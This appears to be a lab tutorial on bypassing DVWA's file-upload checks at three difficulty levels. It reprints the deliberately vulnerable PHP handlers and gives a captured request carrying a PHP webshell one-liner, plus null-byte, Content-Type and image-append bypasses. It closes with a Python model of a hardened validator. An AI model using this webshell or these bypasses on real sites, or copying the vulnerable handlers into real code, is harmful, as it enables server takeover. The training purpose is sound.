DVWA upload vulnerability testing examples

Updated: 2020-04-06    Source: Upload tools


Low:

<?php

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // No check on type, extension or content: whatever the client sent is written under the web root.
    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ "uploaded" ][ "tmp_name" ], $target_path ) ) {
        // No
        echo "Your image was not uploaded.";
    }
    else {
        // Yes!
        echo "{$target_path} successfully uploaded!";
    }
}

?>
There is no restriction on the file type: upload a PHP file directly, then visit http://localhost/hackable/uploads/XX.php.

Medium:

<?php

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // File information
    $uploaded_name = $_FILES[ "uploaded" ][ "name" ];
    $uploaded_type = $_FILES[ "uploaded" ][ "type" ];
    $uploaded_size = $_FILES[ "uploaded" ][ "size" ];

    // Is it an image? Only the client-supplied Content-Type and the size are checked;
    // both come from the request, so neither is trusted data.
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ "uploaded" ][ "tmp_name" ], $target_path ) ) {
            // No
            echo "Your image was not uploaded.";
        }
        else {
            // Yes!
            echo "{$target_path} successfully uploaded!";
        }
    }
    else {
        // Invalid file
        echo "Your image was not uploaded. We can only accept JPEG or PNG images.";
    }
}

?>
The upload is now restricted.
Bypass 1: use Burp Suite for a 00 truncation: name the file 1.php .jpg (note the space in the middle), then in the intercepted request change the space to 00.
Bypass 2: upload the file 2.php directly and intercept it; the request looks like this:


POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

$item["wind"] = "assert";

$array[] = $item;

$array[0]["wind"]($_POST["loveautumn"]);

?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
Change the part that was highlighted in red, the file part's "Content-Type: application/octet-stream" line, to "Content-Type: image/jpeg" and the check is bypassed.


High:

<?php

if( isset( $_POST[ "Upload" ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ "uploaded" ][ "name" ] );

    // File information
    $uploaded_name = $_FILES[ "uploaded" ][ "name" ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, "." ) + 1);
    $uploaded_size = $_FILES[ "uploaded" ][ "size" ];
    $uploaded_tmp  = $_FILES[ "uploaded" ][ "tmp_name" ];

    // Is it an image? The extension is read after the last "." of the client name, the size is
    // checked, and getimagesize() must parse the temp file; the file body is stored exactly as sent.
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo "Your image was not uploaded.";
        }
        else {
            // Yes!
            echo "{$target_path} successfully uploaded!";
        }
    }
    else {
        // Invalid file
        echo "Your image was not uploaded. We can only accept JPEG or PNG images.";
    }
}

?>
The image's name and type are strictly checked, so a file-header spoof can be used against this. Also, suppose the file name is 1.php.png: strrpos finds the last "." at position 5, and substr then takes the name from the sixth character onward, so the final uploaded file name ends up as png and gets blocked.
First, open a normal image file in Notepad, write the PHP one-liner at the very end of the image and save. This spoofs the file-type check.
Finally, bypass the file-name handling. Rename the file 1.php .png, upload it and intercept with Burp Suite. Changing the part
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"
to
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"
gives you a file named x00.php .png; this was mentioned in an earlier article on a PHP arbitrary file upload vulnerability. The space truncation does not work. I do not know the final answer yet; perhaps upload a jpg containing the one-liner and then finish with file inclusion? Left open for now.
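The three handlers above each trust something the client controls: the filename (Low), the Content-Type header (Medium), or the extension plus a parsable image body (High). As an added example, not DVWA's own code and not its "impossible" level, the following Python models the checks a hardened handler makes instead: it never reads the client Content-Type, refuses null-byte and trailing-space filenames, classifies by magic bytes and end-of-file marker so a one-liner appended to a real image is caught, and stores under a random server-chosen name so a double extension such as 1.php.png never reaches disk. Python is used as a language-neutral model (DVWA itself is PHP); PNG_SKELETON is a constructed input, not a decodable image.

```python
import os
import secrets
# Magic bytes and end-of-file markers for the two types the DVWA handler claims to accept.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff"}
TRAILER = {"png": b"IEND\xae\x42\x60\x82", "jpg": b"\xff\xd9"}  # IEND chunk + CRC; JPEG EOI
MAX_SIZE = 100000  # same limit as the DVWA code above

class RejectedUpload(ValueError):
    """Carries the refusal reason: log it server-side, do not echo it to the client."""

def extension_from_name(client_name: str) -> str:
    """Read the extension from the client filename, refusing the filename tricks shown above."""
    name = os.path.basename(client_name.replace("\\", "/")).lower()
    if any(ord(c) < 0x20 for c in name):         # "1.php\x00.jpg": null byte / control chars
        raise RejectedUpload("control character in filename")
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or stem != stem.rstrip(" ."):  # "1.php .jpg": space before the ext
        raise RejectedUpload("malformed filename")
    if ext not in ("jpg", "jpeg", "png"):
        raise RejectedUpload("extension not allowed")
    return "jpg" if ext == "jpeg" else ext

def image_type_from_bytes(data: bytes) -> str:
    """Classify by content; the client Content-Type header is never consulted."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            if not data.endswith(TRAILER[kind]):    # a one-liner appended to a real image
                raise RejectedUpload("data after image trailer")
            if b"<?php" in data or b"<?=" in data:  # open tag hidden in EXIF/comment chunks
                raise RejectedUpload("php open tag inside image")
            return kind
    raise RejectedUpload("not a JPEG or PNG")

def validate_upload(client_name: str, data: bytes) -> str:
    """Return a random server-chosen storage name; the client name never reaches disk."""
    if len(data) >= MAX_SIZE:
        raise RejectedUpload("too large")
    claimed, actual = extension_from_name(client_name), image_type_from_bytes(data)
    if claimed != actual:
        raise RejectedUpload(f"extension {claimed} does not match content {actual}")
    return f"{secrets.token_hex(16)}.{actual}"

def rejection_reason(client_name: str, data: bytes):
    """Refusal reason as a string, or None when the file would be stored."""
    try:
        validate_upload(client_name, data)
    except RejectedUpload as exc:
        return str(exc)
    return None

PNG_SKELETON = MAGIC["png"] + b"\x00\x00\x00\x00IEND\xae\x42\x60\x82"  # constructed; not a real image
```

The trailer check is deliberately strict and will refuse the occasional legitimate JPEG that carries trailing bytes; re-encoding the image with an image library before storing it is the more robust alternative.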

Source: http://www.bbyears.com/shipin/92200.html